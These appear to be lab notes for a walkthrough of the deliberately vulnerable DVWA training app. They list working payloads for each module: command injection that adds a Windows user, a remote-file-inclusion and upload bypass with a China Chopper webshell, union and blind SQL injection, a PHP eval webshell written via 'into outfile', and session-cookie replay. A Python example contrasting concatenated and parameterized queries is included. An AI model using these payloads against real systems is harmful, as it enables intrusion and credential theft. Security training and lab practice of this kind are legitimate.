Set the DVWA security level to low.
1. Brute Force
Start Burp Suite and brute-force the admin user's password.
2. Command Injection
127.0.0.1 & net user zs 123 /add
127.0.0.1 & net user
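3. CSRF (Cross-Site Request Forgery)
Start Burp and intercept the CSRF password-change request.
Generate the CSRF document and write it to index.htm.
Copy index.htm to c:\inetpub\wwwroot on your own server.
Lure a user who is currently working in the admin back end into visiting the index.htm page on your server.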
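4. File Inclusion
Rename "创建一句话木马.txt" ("create one-line webshell.txt") to aa.txt and copy it to c:\inetpub\wwwroot on your own server.
In DVWA "File Inclusion", set the included file to http://<own-server-ip>/aa.txt; note the URL of the webshell once it has been created.
Start the "过狗" (WAF-bypass) build of China Chopper and connect to the one-line webshell.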
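5. File Upload
Change the extension of the one-line webshell to .jpg.
Intercept the upload with Burp Suite and change the file name back to .php.
Start the "过狗" (WAF-bypass) build of China Chopper and connect to the one-line webshell:
http://192.168.226.175/dvwa/hackable/uploads/aa.php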
6. Insecure CAPTCHA
( Apply for Google reCAPTCHA keys:
6LdJJlUUAAAAAH1Q6cTpZRQ2Ah8VpyzhnffD0mBb
6LdJJlUUAAAAAM2a3HrgzLczqdYp4g05EqDs-W4K )
step=1 ---> step=2
7. SQL Injection
1' and '1'='1
1' order by 2 #
1' union select 1,database() #
1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa' #
1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #
1' union select user,password from users #
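
Why the item 7 payloads work against a query built by string concatenation and return nothing against a parameterized query, as an added example that is not part of the original notes. It assumes an in-memory SQLite table with constructed rows in place of DVWA's MySQL database, so the payloads' trailing `#` comment becomes `--`; the function names and sample rows are hypothetical.

```python
import sqlite3

def make_db():
    """Constructed stand-in for a users table (sample rows, not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id TEXT PRIMARY KEY, first_name TEXT, "
        "last_name TEXT, user TEXT, password TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?,?,?,?,?)", [
        ("1", "admin", "admin", "admin", "constructed-hash-1"),
        ("2", "Gordon", "Brown", "gordonb", "constructed-hash-2"),
    ])
    return conn

def lookup_vulnerable(conn, user_id):
    # Input is pasted into the SQL text: a quote in user_id closes the string
    # literal and everything after it is parsed as SQL.
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(sql).fetchall()

def lookup_safe(conn, user_id):
    # Placeholder binding: the input is sent as data and never parsed as SQL,
    # so the whole payload is compared to user_id as one literal string.
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(sql, (user_id,)).fetchall()

# Payloads from item 7; "#" (MySQL comment) is written as SQLite's "--".
TAUTOLOGY_PAYLOAD = "1' and '1'='1"
UNION_PAYLOAD = "1' union select user,password from users -- "

if __name__ == "__main__":
    conn = make_db()
    for label, value in [("normal", "1"),
                         ("tautology", TAUTOLOGY_PAYLOAD),
                         ("union", UNION_PAYLOAD)]:
        print(label)
        print("  concatenated :", lookup_vulnerable(conn, value))
        print("  parameterized:", lookup_safe(conn, value))
```
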
8. SQL Injection (Blind)
1' and length(database())=? #
1' and ascii(substr(database(),1,1))>100 #
1' and (select count(table_name) from information_schema.tables where table_schema=database() )=? #
1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1))=? #
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))>103 #
1' and (select count(column_name) from information_schema.columns where table_name='users')=? #    (the page shows "exists")
1' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit ?,1),1,1))>116 #    (the user column)
1' union select 1,'<?php @eval($_POST["pass"]) ?>' into outfile 'c:/wamp/www/dvwa/my.php' #
9. Weak Session IDs
dvwaSession=3; security=low; PHPSESSID=
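10. XSS (DOM) (XSS: cross-site scripting)
11. XSS (Reflected)
12. XSS (Stored)
zs
Use the collected client cookie value in place of the local cookie to skip authentication and access the other user's site information.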